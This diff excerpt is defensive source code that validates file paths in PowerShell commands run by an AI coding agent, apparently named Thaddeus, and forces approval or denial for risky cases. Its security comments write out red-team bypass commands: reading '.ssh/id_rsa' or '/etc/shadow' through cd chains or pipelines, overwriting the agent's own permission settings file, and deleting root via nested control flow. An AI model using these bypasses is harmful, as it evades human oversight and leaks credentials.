+ reason: `Path '${normalizedPath}' uses a non-filesystem provider and requires manual approval`,
972
+ },
973
+ };
974
+ }
975
+ // SECURITY: Block glob patterns in write/create operations
976
+ if (GLOB_PATTERN_REGEX.test(normalizedPath)) {
977
+ if (operationType === 'write' || operationType === 'create') {
978
+ return {
979
+ allowed: false,
980
+ resolvedPath: normalizedPath,
981
+ decisionReason: {
982
+ type: 'other',
983
+ reason: 'Glob patterns are not allowed in write operations. Please specify an exact file path.',
984
+ },
985
+ };
986
+ }
987
+ // For read operations with path traversal (e.g., /project/*/../../../etc/shadow),
988
+ // resolve the full path (including glob chars) and validate that resolved path.
989
+ // This catches patterns that escape the working directory via `..` after the glob.
990
+ if (containsPathTraversal(normalizedPath)) {
991
+ const absolutePath = isAbsolute(normalizedPath)
992
+ ? normalizedPath
993
+ : resolve(cwd, normalizedPath);
994
+ const { resolvedPath, isCanonical } = safeResolvePath(getFsImplementation(), absolutePath);
995
+ const result = isPathAllowed(resolvedPath, toolPermissionContext, operationType, isCanonical ? [resolvedPath] : undefined);
996
+ return {
997
+ allowed: result.allowed,
998
+ resolvedPath,
999
+ decisionReason: result.decisionReason,
1000
+ };
1001
+ }
1002
+ // SECURITY (finding #15): Glob patterns for read operations cannot be
1003
+ // statically validated. getGlobBaseDirectory returns the directory before
1004
+ // the first glob char; only that base is realpathed. Anything matched by
1005
+ // the glob (including symlinks) is never examined. Example:
1006
+ // /project/*/passwd with symlink /project/link → /etc
1007
+ // Base dir is /project (allowed), but runtime expands * to 'link' and
1008
+ // reads /etc/passwd. We cannot validate symlinks inside glob expansion
1009
+ // without actually expanding the glob (requires filesystem access and
1010
+ // still races with attacker creating symlinks post-validation).
1011
+ //
1012
+ // Still check deny rules on the base directory so explicit Read(/project/**)
1013
+ // deny rules fire. If no deny matches, force ask.
1014
+ const basePath = getGlobBaseDirectory(normalizedPath);
1015
+ const absoluteBasePath = isAbsolute(basePath)
1016
+ ? basePath
1017
+ : resolve(cwd, basePath);
1018
+ const { resolvedPath } = safeResolvePath(getFsImplementation(), absoluteBasePath);
1019
+ const permissionType = operationType === 'read' ? 'read' : 'edit';
1020
+ const denyRule = matchingRuleForInput(resolvedPath, toolPermissionContext, permissionType, 'deny');
1021
+ if (denyRule !== null) {
1022
+ return {
1023
+ allowed: false,
1024
+ resolvedPath,
1025
+ decisionReason: { type: 'rule', rule: denyRule },
1026
+ };
1027
+ }
1028
+ return {
1029
+ allowed: false,
1030
+ resolvedPath,
1031
+ decisionReason: {
1032
+ type: 'other',
1033
+ reason: 'Glob patterns in paths cannot be statically validated — symlinks inside the glob expansion are not examined. Requires manual approval.',
1034
+ },
1035
+ };
1036
+ }
1037
+ // Resolve path
1038
+ const absolutePath = isAbsolute(normalizedPath)
1039
+ ? normalizedPath
1040
+ : resolve(cwd, normalizedPath);
1041
+ const { resolvedPath, isCanonical } = safeResolvePath(getFsImplementation(), absolutePath);
1042
+ const result = isPathAllowed(resolvedPath, toolPermissionContext, operationType, isCanonical ? [resolvedPath] : undefined);
1043
+ return {
1044
+ allowed: result.allowed,
1045
+ resolvedPath,
1046
+ decisionReason: result.decisionReason,
1047
+ };
1048
+ }
1049
+ function getGlobBaseDirectory(filePath) {
1050
+ const globMatch = filePath.match(GLOB_PATTERN_REGEX);
1051
+ if (!globMatch || globMatch.index === undefined) {
1052
+ return filePath;
1053
+ }
1054
+ const beforeGlob = filePath.substring(0, globMatch.index);
1055
+ const lastSepIndex = Math.max(beforeGlob.lastIndexOf('/'), beforeGlob.lastIndexOf('\\'));
1056
+ if (lastSepIndex === -1)
1057
+ return '.';
1058
+ return beforeGlob.substring(0, lastSepIndex + 1) || '/';
1059
+ }
1060
+ /**
1061
+ * Element types that are safe to extract as literal path strings.
1062
+ *
1063
+ * Only element types with statically-known string values are safe for path
1064
+ * extraction. Variable and ExpandableString have runtime-determined values —
1065
+ * even though they're defended downstream ($ detection in validatePath's
1066
+ * `includes('$')` check, and the hasExpandableStrings security flag), excluding
1067
+ * them here is defense-in-direct: fail-safe at the earliest gate rather than
1068
+ * relying on downstream checks to catch them.
1069
+ *
1070
+ * Any other type (e.g., 'Other' for ArrayLiteralExpressionAst, 'SubExpression',
1071
+ * 'ScriptBlock', 'Variable', 'ExpandableString') cannot be statically validated
1072
+ * and must force an ask.
1073
+ */
1074
+ const SAFE_PATH_ELEMENT_TYPES = new Set(['StringConstant', 'Parameter']);
1075
+ /**
1076
+ * Extract file paths from a parsed PowerShell command element.
1077
+ * Uses the AST args to find positional and named path parameters.
1078
+ *
1079
+ * If any path argument has a complex elementType (e.g., array literal,
1080
+ * subexpression) that cannot be statically validated, sets
1081
+ * hasUnvalidatablePathArg so the caller can force an ask.
1082
+ */
1083
+ function extractPathsFromCommand(cmd) {
1084
+ const canonical = resolveToCanonical(cmd.name);
1085
+ const config = CMDLET_PATH_CONFIG[canonical];
1086
+ if (!config) {
1087
+ return {
1088
+ paths: [],
1089
+ operationType: 'read',
1090
+ hasUnvalidatablePathArg: false,
1091
+ optionalWrite: false,
1092
+ };
1093
+ }
1094
+ // Build per-cmdlet known-param sets, merging in common parameters.
1095
+ const switchParams = [...config.knownSwitches, ...COMMON_SWITCHES];
1096
+ const valueParams = [...config.knownValueParams, ...COMMON_VALUE_PARAMS];
1097
+ const paths = [];
1098
+ const args = cmd.args;
1099
+ // elementTypes[0] is the command name; elementTypes[i+1] corresponds to args[i]
1100
+ const elementTypes = cmd.elementTypes;
1101
+ let hasUnvalidatablePathArg = false;
1102
+ let positionalsSeen = 0;
1103
+ const positionalSkip = config.positionalSkip ?? 0;
1104
+ function checkArgElementType(argIdx) {
1105
+ if (!elementTypes)
1106
+ return;
1107
+ const et = elementTypes[argIdx + 1];
1108
+ if (et && !SAFE_PATH_ELEMENT_TYPES.has(et)) {
1109
+ hasUnvalidatablePathArg = true;
1110
+ }
1111
+ }
1112
+ // Extract named parameter values (e.g., -Path "C:\foo")
1113
+ for (let i = 0; i < args.length; i++) {
1114
+ const arg = args[i];
1115
+ if (!arg)
1116
+ continue;
1117
+ // Check if this arg is a parameter name.
1118
+ // SECURITY: Use elementTypes as ground truth. PowerShell's tokenizer
1119
+ // accepts en-dash/em-dash/horizontal-bar (U+2013/2014/2015) as parameter
1120
+ // prefixes; a raw startsWith('-') check misses `–Path` (en-dash). The
1121
+ // parser maps CommandParameterAst → 'Parameter' regardless of dash char.
1122
+ // isPowerShellParameter also correctly rejects quoted "-Include"
1123
+ // (StringConstant, not a parameter).
1124
+ const argElementType = elementTypes ? elementTypes[i + 1] : undefined;
1125
+ if (isPowerShellParameter(arg, argElementType)) {
1126
+ // Handle colon syntax: -Path:C:\secret
1127
+ // Normalize Unicode dash to ASCII `-` (pathParams are stored with `-`).
1128
+ const normalized = '-' + arg.slice(1);
1129
+ const colonIdx = normalized.indexOf(':', 1); // skip first char (the dash)
1130
+ const paramName = colonIdx > 0 ? normalized.substring(0, colonIdx) : normalized;
1131
+ const paramLower = paramName.toLowerCase();
1132
+ if (matchesParam(paramLower, config.pathParams)) {
1133
+ // Known path parameter — extract its value as a path.
1134
+ let value;
1135
+ if (colonIdx > 0) {
1136
+ // Colon syntax: -Path:value — the whole thing is one element.
1137
+ // SECURITY: comma-separated values (e.g., -Path:safe.txt,/etc/passwd)
1138
+ // produce ArrayLiteralExpressionAst inside the CommandParameterAst.
1139
+ // PowerShell writes to ALL paths, but we see a single string.
1140
+ const rawValue = arg.substring(colonIdx + 1);
1141
+ if (hasComplexColonValue(rawValue)) {
1142
+ hasUnvalidatablePathArg = true;
1143
+ }
1144
+ else {
1145
+ value = rawValue;
1146
+ }
1147
+ }
1148
+ else {
1149
+ // Standard syntax: -Path value
1150
+ const nextVal = args[i + 1];
1151
+ const nextType = elementTypes ? elementTypes[i + 2] : undefined;
1152
+ if (nextVal && !isPowerShellParameter(nextVal, nextType)) {
1153
+ value = nextVal;
1154
+ checkArgElementType(i + 1);
1155
+ i++; // Skip the value
1156
+ }
1157
+ }
1158
+ if (value) {
1159
+ paths.push(value);
1160
+ }
1161
+ }
1162
+ else if (config.leafOnlyPathParams &&
1163
+ matchesParam(paramLower, config.leafOnlyPathParams)) {
1164
+ // Leaf-only path parameter (e.g., New-Item -Name). PowerShell resolves
1165
+ // this relative to ANOTHER parameter (-Path), not cwd. validatePath
1166
+ // resolves against cwd (L930), so non-leaf values (separators,
1167
+ // traversal) resolve to the WRONG location and can miss deny rules
1168
+ // (deny→ask downgrade). Extract simple leaf filenames; flag anything
1169
+ // path-like.
1170
+ let value;
1171
+ if (colonIdx > 0) {
1172
+ const rawValue = arg.substring(colonIdx + 1);
1173
+ if (hasComplexColonValue(rawValue)) {
1174
+ hasUnvalidatablePathArg = true;
1175
+ }
1176
+ else {
1177
+ value = rawValue;
1178
+ }
1179
+ }
1180
+ else {
1181
+ const nextVal = args[i + 1];
1182
+ const nextType = elementTypes ? elementTypes[i + 2] : undefined;
1183
+ if (nextVal && !isPowerShellParameter(nextVal, nextType)) {
1184
+ value = nextVal;
1185
+ checkArgElementType(i + 1);
1186
+ i++;
1187
+ }
1188
+ }
1189
+ if (value !== undefined) {
1190
+ if (value.includes('/') ||
1191
+ value.includes('\\') ||
1192
+ value === '.' ||
1193
+ value === '..') {
1194
+ // Non-leaf: separators or traversal. Can't resolve correctly
1195
+ // without joining against -Path. Force ask.
1196
+ hasUnvalidatablePathArg = true;
1197
+ }
1198
+ else {
1199
+ // Simple leaf: extract. Resolves to cwd/leaf (slightly wrong —
1200
+ // should be <-Path>/leaf) but -Path extraction covers the
1201
+ // directory, and a leaf filename can't traverse out of anywhere.
1202
+ paths.push(value);
1203
+ }
1204
+ }
1205
+ }
1206
+ else if (matchesParam(paramLower, switchParams)) {
1207
+ // Known switch parameter — takes no value, do NOT consume next arg.
1208
+ // (Colon syntax on a switch, e.g., -Confirm:$false, is self-contained
1209
+ // in one token and correctly falls through here without consuming.)
1210
+ }
1211
+ else if (matchesParam(paramLower, valueParams)) {
1212
+ // Known value-taking non-path parameter (e.g., -Encoding UTF8, -Filter *.txt).
1213
+ // Consume its value; do NOT validate as path, but DO check elementType.
1214
+ // SECURITY: A Variable elementType (e.g., $env:ANTHROPIC_API_KEY) in any
1215
+ // argument position means the runtime value is not statically knowable.
1216
+ // Without this check, `-Value $env:SECRET` would be silently auto-allowed
1217
+ // in acceptEdits mode because the Variable elementType was never examined.
1218
+ if (colonIdx > 0) {
1219
+ // Colon syntax: -Value:$env:FOO — the value is embedded in the token.
1220
+ // The outer CommandParameterAst 'Parameter' type masks the inner
1221
+ // expression type. Check for expression markers that indicate a
1222
+ // non-static value (mirrors pathParams colon-syntax guards).
1223
+ const rawValue = arg.substring(colonIdx + 1);
1224
+ if (hasComplexColonValue(rawValue)) {
1225
+ hasUnvalidatablePathArg = true;
1226
+ }
1227
+ }
1228
+ else {
1229
+ const nextArg = args[i + 1];
1230
+ const nextArgType = elementTypes ? elementTypes[i + 2] : undefined;
1231
+ if (nextArg && !isPowerShellParameter(nextArg, nextArgType)) {
1232
+ checkArgElementType(i + 1);
1233
+ i++; // Skip the parameter's value
1234
+ }
1235
+ }
1236
+ }
1237
+ else {
1238
+ // Unknown parameter — we do not understand this invocation.
1239
+ // SECURITY: This is the structural fix for the KNOWN_SWITCH_PARAMS
1240
+ // whack-a-mole. Rather than guess whether this param is a switch
1241
+ // (and risk swallowing a positional path) or takes a value (and
1242
+ // risk the same), we flag the whole command as unvalidatable.
1243
+ // The caller will force an ask.
1244
+ hasUnvalidatablePathArg = true;
1245
+ // SECURITY: Even though we don't recognize this param, if it uses
1246
+ // colon syntax (-UnknownParam:/etc/hosts) the bound value might be
1247
+ // a filesystem path. Extract it into paths[] so deny-rule matching
1248
+ // still runs. Without this, the value is trapped inside the single
1249
+ // token and paths=[] means deny rules are never consulted —
1250
+ // downgrading deny to ask. This is defense-in-depth: the primary
1251
+ // fix is adding all known aliases to pathParams above.
1252
+ if (colonIdx > 0) {
1253
+ const rawValue = arg.substring(colonIdx + 1);
1254
+ if (!hasComplexColonValue(rawValue)) {
1255
+ paths.push(rawValue);
1256
+ }
1257
+ }
1258
+ // Continue the loop so we still extract any recognizable paths
1259
+ // (useful for the ask message), but the flag ensures overall 'ask'.
1260
+ }
1261
+ continue;
1262
+ }
1263
+ // Positional arguments: extract as paths (e.g., Get-Content file.txt)
1264
+ // The first positional arg is typically the source path.
1265
+ // Skip leading positionals that are non-path values (e.g., iwr's -Uri).
1266
+ if (positionalsSeen < positionalSkip) {
1267
+ positionalsSeen++;
1268
+ continue;
1269
+ }
1270
+ positionalsSeen++;
1271
+ checkArgElementType(i);
1272
+ paths.push(arg);
1273
+ }
1274
+ return {
1275
+ paths,
1276
+ operationType: config.operationType,
1277
+ hasUnvalidatablePathArg,
1278
+ optionalWrite: config.optionalWrite ?? false,
1279
+ };
1280
+ }
1281
+ /**
1282
+ * Checks path constraints for PowerShell commands.
1283
+ * Extracts file paths from the parsed AST and validates they are
1284
+ * within allowed directories.
1285
+ *
1286
+ * @param compoundCommandHasCd - Whether the full compound command contains a
1287
+ * cwd-changing cmdlet (Set-Location/Push-Location/Pop-Location/New-PSDrive,
1288
+ * excluding no-op Set-Location-to-CWD). When true, relative paths in ANY
1289
+ * statement cannot be trusted — PowerShell executes statements sequentially
1290
+ * and a cd in statement N changes the cwd for statement N+1, but this
1291
+ * validator resolves all paths against the stale Node process cwd.
1292
+ * BashTool parity (BashTool/pathValidation.ts:630-655).
1293
+ *
1294
+ * @returns
1295
+ * - 'ask' if any path command tries to access outside allowed directories
1296
+ * - 'deny' if a deny rule explicitly blocks the path
1297
+ * - 'passthrough' if no path commands were found or all paths are valid
1298
+ */
1299
+ export function checkPathConstraints(input, parsed, toolPermissionContext, compoundCommandHasCd = false) {
1300
+ if (!parsed.valid) {
1301
+ return {
1302
+ behavior: 'passthrough',
1303
+ message: 'Cannot validate paths for unparsed command',
1304
+ };
1305
+ }
1306
+ // SECURITY: Two-pass approach — check ALL statements/paths so deny rules
1307
+ // always take precedence over ask. Without this, an ask on statement 1
1308
+ // could return before checking statement 2 for deny rules, letting the
1309
+ // user approve a command that includes a denied path.
1310
+ let firstAsk;
1311
+ for (const statement of parsed.statements) {
1312
+ const result = checkPathConstraintsForStatement(statement, toolPermissionContext, compoundCommandHasCd);
1313
+ if (result.behavior === 'deny') {
1314
+ return result;
1315
+ }
1316
+ if (result.behavior === 'ask' && !firstAsk) {
1317
+ firstAsk = result;
1318
+ }
1319
+ }
1320
+ return (firstAsk ?? {
1321
+ behavior: 'passthrough',
1322
+ message: 'All path constraints validated successfully',
1323
+ });
1324
+ }
1325
+ function checkPathConstraintsForStatement(statement, toolPermissionContext, compoundCommandHasCd = false) {
1326
+ const cwd = getCwd();
1327
+ let firstAsk;
1328
+ // SECURITY: BashTool parity — block path operations in compound commands
1329
+ // containing a cwd-changing cmdlet (BashTool/pathValidation.ts:630-655).
1330
+ //
1331
+ // When the compound contains Set-Location/Push-Location/Pop-Location/
1332
+ // New-PSDrive, relative paths in later statements resolve against the
1333
+ // CHANGED cwd at runtime, but this validator resolves them against the
1334
+ // STALE getCwd() snapshot. Example attack (finding #3):
1335
+ // Set-Location ./.claude; Set-Content ./settings.json '...'
1336
+ // Validator sees ./settings.json → /project/settings.json (not a config file).
1337
+ // Runtime writes /project/.claude/settings.json (Thaddeus's permission config).
1338
+ //
1339
+ // ALTERNATIVE APPROACH (rejected): simulate cwd through the statement chain
1340
+ // — after `Set-Location ./.claude`, validate subsequent statements with
1341
+ // cwd='./.claude'. This would be more permissive but requires careful
1342
+ // handling of:
1343
+ // - Push-Location/Pop-Location stack semantics
1344
+ // - Set-Location with no args (→ home on some platforms)
1345
+ // - New-PSDrive root mapping (arbitrary filesystem root)
1346
+ // - Conditional/loop statements where cd may or may not execute
1347
+ // - Error cases where the cd target can't be statically determined
1348
+ // For now we take the conservative approach of requiring manual approval.
1349
+ //
1350
+ // Unlike BashTool which gates on `operationType !== 'read'`, we also block
1351
+ // READS (finding #27): `Set-Location ~; Get-Content ./.ssh/id_rsa` bypasses
1352
+ // Read(~/.ssh/**) deny rules because the validator matched the deny against
1353
+ // /project/.ssh/id_rsa. Reads from mis-resolved paths leak data just as
1354
+ // writes destroy it. We still run deny-rule matching below (via firstAsk,
1355
+ // not early return) so explicit deny rules on the stale-resolved path are
1356
+ // honored — deny > ask in the caller's reduce.
1357
+ if (compoundCommandHasCd) {
1358
+ firstAsk = {
1359
+ behavior: 'ask',
1360
+ message: 'Compound command changes working directory (Set-Location/Push-Location/Pop-Location/New-PSDrive) — relative paths cannot be validated against the original cwd and require manual approval',
1361
+ decisionReason: {
1362
+ type: 'other',
1363
+ reason: 'Compound command contains cd with path operation — manual approval required to prevent path resolution bypass',
1364
+ },
1365
+ };
1366
+ }
1367
+ // SECURITY: Track whether this statement contains a non-CommandAst pipeline
1368
+ // element (string literal, variable, array expression). PowerShell pipes
1369
+ // these values to downstream cmdlets, often binding to -Path. Example:
1370
+ // `'/etc/passwd' | Remove-Item` — the string is piped to Remove-Item's -Path,
1371
+ // but Remove-Item has no explicit args so extractPathsFromCommand returns
1372
+ // zero paths and the command would passthrough. If ANY downstream cmdlet
1373
+ // appears alongside an expression source, we force an ask — the piped
1374
+ // path is unvalidatable regardless of operation type (reads leak data;
1375
+ // writes destroy it).
1376
+ let hasExpressionPipelineSource = false;
1377
+ // Track the non-CommandAst element's text for deny-rule guessing (finding #23).
1378
+ // `'.git/hooks/pre-commit' | Remove-Item` — path comes via pipeline, paths=[]
1379
+ // from extractPathsFromCommand, so the deny loop below never iterates. We
1380
+ // feed the pipeline-source text through checkDenyRuleForGuessedPath so
1381
+ // explicit Edit(.git/**) deny rules still fire.
1382
+ let pipelineSourceText;
1383
+ for (const cmd of statement.commands) {
1384
+ if (cmd.elementType !== 'CommandAst') {
1385
+ hasExpressionPipelineSource = true;
1386
+ pipelineSourceText = cmd.text;
1387
+ continue;
1388
+ }
1389
+ const { paths, operationType, hasUnvalidatablePathArg, optionalWrite } = extractPathsFromCommand(cmd);
1390
+ // SECURITY: Cmdlet receiving piped path from expression source.
1391
+ // `'/etc/shadow' | Get-Content` — Get-Content extracts zero paths
1392
+ // (no explicit args). The path comes from the pipeline, which we cannot
1393
+ // statically validate. Previously exempted reads (`operationType !== 'read'`),
1394
+ // but that was a bypass (review comment 2885739292): reads from
1395
+ // unvalidatable paths are still a security risk. Ask regardless of op type.
1396
+ if (hasExpressionPipelineSource) {
1397
+ const canonical = resolveToCanonical(cmd.name);
1398
+ // SECURITY (finding #23): Before falling back to ask, check if the
1399
+ // pipeline-source text matches a deny rule. `'.git/hooks/pre-commit' |
1400
+ // Remove-Item` should DENY (not ask) when Edit(.git/**) is configured.
1401
+ // Strip surrounding quotes (string literals are quoted in .text) and
1402
+ // feed through the same deny-guess helper used for ::/backtick paths.
1403
+ if (pipelineSourceText !== undefined) {
1404
+ const stripped = pipelineSourceText.replace(/^['"]|['"]$/g, '');
1405
+ const denyHit = checkDenyRuleForGuessedPath(stripped, cwd, toolPermissionContext, operationType);
1406
+ if (denyHit) {
1407
+ return {
1408
+ behavior: 'deny',
1409
+ message: `${canonical} targeting '${denyHit.resolvedPath}' was blocked by a deny rule`,
1410
+ decisionReason: { type: 'rule', rule: denyHit.rule },
1411
+ };
1412
+ }
1413
+ }
1414
+ firstAsk ??= {
1415
+ behavior: 'ask',
1416
+ message: `${canonical} receives its path from a pipeline expression source that cannot be statically validated and requires manual approval`,
1417
+ };
1418
+ // Don't continue — fall through to path loop so deny rules on
1419
+ // extracted paths are still checked.
1420
+ }
1421
+ // SECURITY: Array literals, subexpressions, and other complex
1422
+ // argument types cannot be statically validated. An array literal
1423
+ // like `-Path ./safe.txt, /etc/passwd` produces a single 'Other'
1424
+ // element whose combined text may resolve within CWD while
1425
+ // PowerShell actually writes to ALL paths in the array.
1426
+ if (hasUnvalidatablePathArg) {
1427
+ const canonical = resolveToCanonical(cmd.name);
1428
+ firstAsk ??= {
1429
+ behavior: 'ask',
1430
+ message: `${canonical} uses a parameter or complex path expression (array literal, subexpression, unknown parameter, etc.) that cannot be statically validated and requires manual approval`,
1431
+ };
1432
+ // Don't continue — fall through to path loop so deny rules on
1433
+ // extracted paths are still checked.
1434
+ }
1435
+ // SECURITY: Write cmdlet in CMDLET_PATH_CONFIG that extracted zero paths.
1436
+ // Either (a) the cmdlet has no args at all (`Remove-Item` alone —
1437
+ // PowerShell will error, but we shouldn't optimistically assume that), or
1438
+ // (b) we failed to recognize the path among the args (shouldn't happen
1439
+ // with the unknown-param fail-safe, but defense-in-depth). Conservative:
1440
+ // write operation with no validated target → ask.
1441
+ // Read cmdlets and pop-location (pathParams: []) are exempt.
1442
+ // optionalWrite cmdlets (Invoke-WebRequest/Invoke-RestMethod without
1443
+ // -OutFile) are ALSO exempt — they only write to disk when a pathParam is
1444
+ // present; without one, output goes to the pipeline. The
1445
+ // hasUnvalidatablePathArg check above already covers unknown-param cases.
1446
+ if (operationType !== 'read' &&
1447
+ !optionalWrite &&
1448
+ paths.length === 0 &&
1449
+ CMDLET_PATH_CONFIG[resolveToCanonical(cmd.name)]) {
1450
+ const canonical = resolveToCanonical(cmd.name);
1451
+ firstAsk ??= {
1452
+ behavior: 'ask',
1453
+ message: `${canonical} is a write operation but no target path could be determined; requires manual approval`,
1454
+ };
1455
+ continue;
1456
+ }
1457
+ // SECURITY: bash-parity hard-deny for removal cmdlets on
1458
+ // system-critical paths. BashTool has isDangerousRemovalPath which
1459
+ // hard-DENIES `rm /`, `rm ~`, `rm /etc`, etc. regardless of user config.
1460
+ // Port: remove-item (and aliases rm/del/ri/rd/rmdir/erase → resolveToCanonical)
1461
+ // on a dangerous path → deny (not ask). User cannot approve system32 deletion.
1462
+ const isRemoval = resolveToCanonical(cmd.name) === 'remove-item';
1463
+ for (const filePath of paths) {
1464
+ // Hard-deny removal of dangerous system paths (/, ~, /etc, etc.).
1465
+ // Check the RAW path (pre-realpath) first: safeResolvePath can
1466
+ // canonicalize '/' → 'C:\' (Windows) or '/var/...' → '/private/var/...'
1467
+ // (macOS) which defeats isDangerousRemovalPath's string comparisons.
1468
+ if (isRemoval && isDangerousRemovalRawPath(filePath)) {
1469
+ return dangerousRemovalDeny(filePath);
1470
+ }
1471
+ const { allowed, resolvedPath, decisionReason } = validatePath(filePath, cwd, toolPermissionContext, operationType);
1472
+ // Also check the resolved path — catches symlinks that resolve to a
1473
+ // protected location.
1474
+ if (isRemoval && isDangerousRemovalPath(resolvedPath)) {
1475
+ return dangerousRemovalDeny(resolvedPath);
1476
+ }
1477
+ if (!allowed) {
1478
+ const canonical = resolveToCanonical(cmd.name);
1479
+ const workingDirs = Array.from(allWorkingDirectories(toolPermissionContext));
1480
+ const dirListStr = formatDirectoryList(workingDirs);
1481
+ const message = decisionReason?.type === 'other' ||
1482
+ decisionReason?.type === 'safetyCheck'
1483
+ ? decisionReason.reason
1484
+ : `${canonical} targeting '${resolvedPath}' was blocked. For security, Thaddeus may only access files in the allowed working directories for this session: ${dirListStr}.`;
1485
+ if (decisionReason?.type === 'rule') {
1486
+ return {
1487
+ behavior: 'deny',
1488
+ message,
1489
+ decisionReason,
1490
+ };
1491
+ }
1492
+ const suggestions = [];
1493
+ if (resolvedPath) {
1494
+ if (operationType === 'read') {
1495
+ const suggestion = createReadRuleSuggestion(getDirectoryForPath(resolvedPath), 'session');
1496
+ if (suggestion) {
1497
+ suggestions.push(suggestion);
1498
+ }
1499
+ }
1500
+ else {
1501
+ suggestions.push({
1502
+ type: 'addDirectories',
1503
+ directories: [getDirectoryForPath(resolvedPath)],
1504
+ destination: 'session',
1505
+ });
1506
+ }
1507
+ }
1508
+ if (operationType === 'write' || operationType === 'create') {
1509
+ suggestions.push({
1510
+ type: 'setMode',
1511
+ mode: 'acceptEdits',
1512
+ destination: 'session',
1513
+ });
1514
+ }
1515
+ firstAsk ??= {
1516
+ behavior: 'ask',
1517
+ message,
1518
+ blockedPath: resolvedPath,
1519
+ decisionReason,
1520
+ suggestions,
1521
+ };
1522
+ }
1523
+ }
1524
+ }
1525
+ // Also check nested commands from control flow
1526
+ if (statement.nestedCommands) {
1527
+ for (const cmd of statement.nestedCommands) {
1528
+ const { paths, operationType, hasUnvalidatablePathArg, optionalWrite } = extractPathsFromCommand(cmd);
1529
+ if (hasUnvalidatablePathArg) {
1530
+ const canonical = resolveToCanonical(cmd.name);
1531
+ firstAsk ??= {
1532
+ behavior: 'ask',
1533
+ message: `${canonical} uses a parameter or complex path expression (array literal, subexpression, unknown parameter, etc.) that cannot be statically validated and requires manual approval`,
1534
+ };
1535
+ // Don't continue — fall through to path loop for deny checks.
1536
+ }
1537
+ // SECURITY: Write cmdlet with zero extracted paths (mirrors main loop).
1538
+ // optionalWrite cmdlets exempt — see main-loop comment.
1539
+ if (operationType !== 'read' &&
1540
+ !optionalWrite &&
1541
+ paths.length === 0 &&
1542
+ CMDLET_PATH_CONFIG[resolveToCanonical(cmd.name)]) {
1543
+ const canonical = resolveToCanonical(cmd.name);
1544
+ firstAsk ??= {
1545
+ behavior: 'ask',
1546
+ message: `${canonical} is a write operation but no target path could be determined; requires manual approval`,
1547
+ };
1548
+ continue;
1549
+ }
1550
+ // SECURITY: bash-parity hard-deny for removal on system-critical
1551
+ // paths — mirror the main-loop check above. Without this,
1552
+ // `if ($true) { Remove-Item / }` routes through nestedCommands and
1553
+ // downgrades deny→ask, letting the user approve root deletion.
1554
+ const isRemoval = resolveToCanonical(cmd.name) === 'remove-item';
1555
+ for (const filePath of paths) {
1556
+ // Check the RAW path first (pre-realpath); see main-loop comment.
1557
+ if (isRemoval && isDangerousRemovalRawPath(filePath)) {
1558
+ return dangerousRemovalDeny(filePath);
1559
+ }
1560
+ const { allowed, resolvedPath, decisionReason } = validatePath(filePath, cwd, toolPermissionContext, operationType);
1561
+ if (isRemoval && isDangerousRemovalPath(resolvedPath)) {
1562
+ return dangerousRemovalDeny(resolvedPath);
1563
+ }
1564
+ if (!allowed) {
1565
+ const canonical = resolveToCanonical(cmd.name);
1566
+ const workingDirs = Array.from(allWorkingDirectories(toolPermissionContext));
1567
+ const dirListStr = formatDirectoryList(workingDirs);
1568
+ const message = decisionReason?.type === 'other' ||
1569
+ decisionReason?.type === 'safetyCheck'
1570
+ ? decisionReason.reason
1571
+ : `${canonical} targeting '${resolvedPath}' was blocked. For security, Thaddeus may only access files in the allowed working directories for this session: ${dirListStr}.`;
1572
+ if (decisionReason?.type === 'rule') {
1573
+ return {
1574
+ behavior: 'deny',
1575
+ message,
1576
+ decisionReason,
1577
+ };
1578
+ }
1579
+ const suggestions = [];
1580
+ if (resolvedPath) {
1581
+ if (operationType === 'read') {
1582
+ const suggestion = createReadRuleSuggestion(getDirectoryForPath(resolvedPath), 'session');
1583
+ if (suggestion) {
1584
+ suggestions.push(suggestion);
1585
+ }
1586
+ }
1587
+ else {
1588
+ suggestions.push({
1589
+ type: 'addDirectories',
1590
+ directories: [getDirectoryForPath(resolvedPath)],
1591
+ destination: 'session',
1592
+ });
1593
+ }
1594
+ }
1595
+ if (operationType === 'write' || operationType === 'create') {
1596
+ suggestions.push({
1597
+ type: 'setMode',
1598
+ mode: 'acceptEdits',
1599
+ destination: 'session',
1600
+ });
1601
+ }
1602
+ firstAsk ??= {
1603
+ behavior: 'ask',
1604
+ message,
1605
+ blockedPath: resolvedPath,
1606
+ decisionReason,
1607
+ suggestions,
1608
+ };
1609
+ }
1610
+ }
1611
+ // Red-team P11/P14: step 5 at powershellPermissions.ts:970 already
1612
+ // catches this via the same synthetic-CommandExpressionAst mechanism —
1613
+ // this is belt-and-suspenders so the nested loop doesn't rely on that
1614
+ // accident. Placed AFTER the path loop so specific asks (blockedPath,
1615
+ // suggestions) win via ??=.
1616
+ if (hasExpressionPipelineSource) {
1617
+ firstAsk ??= {
1618
+ behavior: 'ask',
1619
+ message: `${resolveToCanonical(cmd.name)} appears inside a control-flow or chain statement where piped expression sources cannot be statically validated and requires manual approval`,
1620
+ };
1621
+ }
1622
+ }
1623
+ }
1624
+ // Check redirections on nested commands (e.g., from && / || chains)
1625
+ if (statement.nestedCommands) {
1626
+ for (const cmd of statement.nestedCommands) {
1627
+ if (cmd.redirections) {
1628
+ for (const redir of cmd.redirections) {
1629
+ if (redir.isMerging)
1630
+ continue;
1631
+ if (!redir.target)
1632
+ continue;
1633
+ if (isNullRedirectionTarget(redir.target))
1634
+ continue;
1635
+ const { allowed, resolvedPath, decisionReason } = validatePath(redir.target, cwd, toolPermissionContext, 'create');
1636
+ if (!allowed) {
1637
+ const workingDirs = Array.from(allWorkingDirectories(toolPermissionContext));
1638
+ const dirListStr = formatDirectoryList(workingDirs);
1639
+ const message = decisionReason?.type === 'other' ||
1640
+ decisionReason?.type === 'safetyCheck'
1641
+ ? decisionReason.reason
1642
+ : `Output redirection to '${resolvedPath}' was blocked. For security, Thaddeus may only write to files in the allowed working directories for this session: ${dirListStr}.`;
1643
+ if (decisionReason?.type === 'rule') {
1644
+ return {
1645
+ behavior: 'deny',
1646
+ message,
1647
+ decisionReason,
1648
+ };
1649
+ }
1650
+ firstAsk ??= {
1651
+ behavior: 'ask',
1652
+ message,
1653
+ blockedPath: resolvedPath,
1654
+ decisionReason,
1655
+ suggestions: [
1656
+ {
1657
+ type: 'addDirectories',
1658
+ directories: [getDirectoryForPath(resolvedPath)],
1659
+ destination: 'session',
1660
+ },
1661
+ ],
1662
+ };
1663
+ }
1664
+ }
1665
+ }
1666
+ }
1667
+ }
1668
+ // Check file redirections
1669
+ if (statement.redirections) {
1670
+ for (const redir of statement.redirections) {
1671
+ if (redir.isMerging)
1672
+ continue;
1673
+ if (!redir.target)
1674
+ continue;
1675
